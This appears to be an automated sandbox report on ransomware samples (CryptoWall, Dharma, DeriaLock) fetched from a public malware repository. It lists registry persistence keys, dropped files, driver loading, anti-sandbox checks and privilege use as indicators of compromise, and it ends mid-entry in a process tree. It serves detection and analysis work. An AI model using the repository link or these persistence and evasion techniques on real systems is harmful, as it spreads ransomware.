hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\irgfxaefabktucwsw\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\irgfxaefabktucwsw.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zawybyxszrgoevc\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\zawybyxszrgoevc.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\cdjbfwrfmrdahfg\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\cdjbfwrfmrdahfg.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\rqqtiwtyllkyagj\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\rqqtiwtyllkyagj.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\owyaczjtbkajhapm\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\owyaczjtbkajhapm.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tuozouhgaaqdpu\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\tuozouhgaaqdpu.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\gpwejduszsbmkwd\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\ac\\gpwejduszsbmkwd.sys"	mssql.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Dharma.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe	DeriaLock.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\logon.exe	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b227d6b7.exe	explorer.exe

Executes dropped EXE 12 IoCs

pid	Process
2820	CryptoWall.exe
400	CryptoWall.exe
4492	CryptoWall.exe
1752	CryptoWall.exe
3192	DeriaLock.exe
4260	Dharma.exe
5032	Dharma.exe
4824	Dharma.exe
2268	nc123.exe
2252	mssql.exe
5080	mssql2.exe
4452	SearchHost.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*227d6b7 = "C:\\Users\\Admin\\AppData\\Roaming\\b227d6b7.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b227d6b = "C:\\b227d6b7\\b227d6b7.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*227d6b = "C:\\b227d6b7\\b227d6b7.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b227d6b7 = "C:\\Users\\Admin\\AppData\\Roaming\\b227d6b7.exe"	explorer.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
43	raw.githubusercontent.com
42	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	ip-addr.es
46	ip-addr.es
88	ip-addr.es
102	ip-addr.es

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2256	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies registry class 31 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 = 5c00310000000000ac58a4b51100444f574e4c4f7e310000440009000400efbea8582d61ac58a4b52e00000070e10100000001000000000000000000000000000000f81ca80044006f0077006e006c006f00610064007300000018000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5000310000000000a858f66c100041646d696e003c0009000400efbea8582d61ac5844b52e00000068e10100000001000000000000000000000000000000364baf00410064006d0069006e00000014000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 7800310000000000a8582d611100557365727300640009000400efbe874f7748ac5844b52e000000c70500000000010000000000000000003a00000000005423290055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\NodeSlot = "3"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff	explorer.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 875045.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 193565.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 515308.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 143466.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 532033.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3644	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1548	msedge.exe
1548	msedge.exe
1076	msedge.exe
1076	msedge.exe
4416	identity_helper.exe
4416	identity_helper.exe
3960	msedge.exe
3960	msedge.exe
1420	msedge.exe
1420	msedge.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
4596	msedge.exe
4596	msedge.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe
3192	DeriaLock.exe

Suspicious behavior: LoadsDriver 32 IoCs

pid	Process
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe
2252	mssql.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2820	CryptoWall.exe
5052	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2780	taskmgr.exe
Token: SeSystemProfilePrivilege	2780	taskmgr.exe
Token: SeCreateGlobalPrivilege	2780	taskmgr.exe
Token: SeDebugPrivilege	3192	DeriaLock.exe
Token: SeDebugPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeDebugPrivilege	5080	mssql2.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeLoadDriverPrivilege	2252	mssql.exe
Token: SeIncreaseQuotaPrivilege	2496	WMIC.exe
Token: SeSecurityPrivilege	2496	WMIC.exe
Token: SeTakeOwnershipPrivilege	2496	WMIC.exe
Token: SeLoadDriverPrivilege	2496	WMIC.exe
Token: SeSystemProfilePrivilege	2496	WMIC.exe
Token: SeSystemtimePrivilege	2496	WMIC.exe
Token: SeProfSingleProcessPrivilege	2496	WMIC.exe
Token: SeIncBasePriorityPrivilege	2496	WMIC.exe
Token: SeCreatePagefilePrivilege	2496	WMIC.exe
Token: SeBackupPrivilege	2496	WMIC.exe
Token: SeRestorePrivilege	2496	WMIC.exe
Token: SeShutdownPrivilege	2496	WMIC.exe
Token: SeDebugPrivilege	2496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2496	WMIC.exe
Token: SeRemoteShutdownPrivilege	2496	WMIC.exe
Token: SeUndockPrivilege	2496	WMIC.exe
Token: SeManageVolumePrivilege	2496	WMIC.exe
Token: 33	2496	WMIC.exe
Token: 34	2496	WMIC.exe
Token: 35	2496	WMIC.exe
Token: 36	2496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2496	WMIC.exe
Token: SeSecurityPrivilege	2496	WMIC.exe
Token: SeTakeOwnershipPrivilege	2496	WMIC.exe
Token: SeLoadDriverPrivilege	2496	WMIC.exe
Token: SeSystemProfilePrivilege	2496	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
1076	msedge.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe
2780	taskmgr.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4892	OpenWith.exe
2252	mssql.exe
5080	mssql2.exe
3644	explorer.exe
3644	explorer.exe
4452	SearchHost.exe
2252	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1076 wrote to memory of 4660	1076	msedge.exe	81
PID 1076 wrote to memory of 4660	1076	msedge.exe	81
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 3944	1076	msedge.exe	82
PID 1076 wrote to memory of 1548	1076	msedge.exe	83
PID 1076 wrote to memory of 1548	1076	msedge.exe	83
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84
PID 1076 wrote to memory of 4724	1076	msedge.exe	84

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1040	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe403346f8,0x7ffe40334708,0x7ffe40334718
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
  2⤵
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
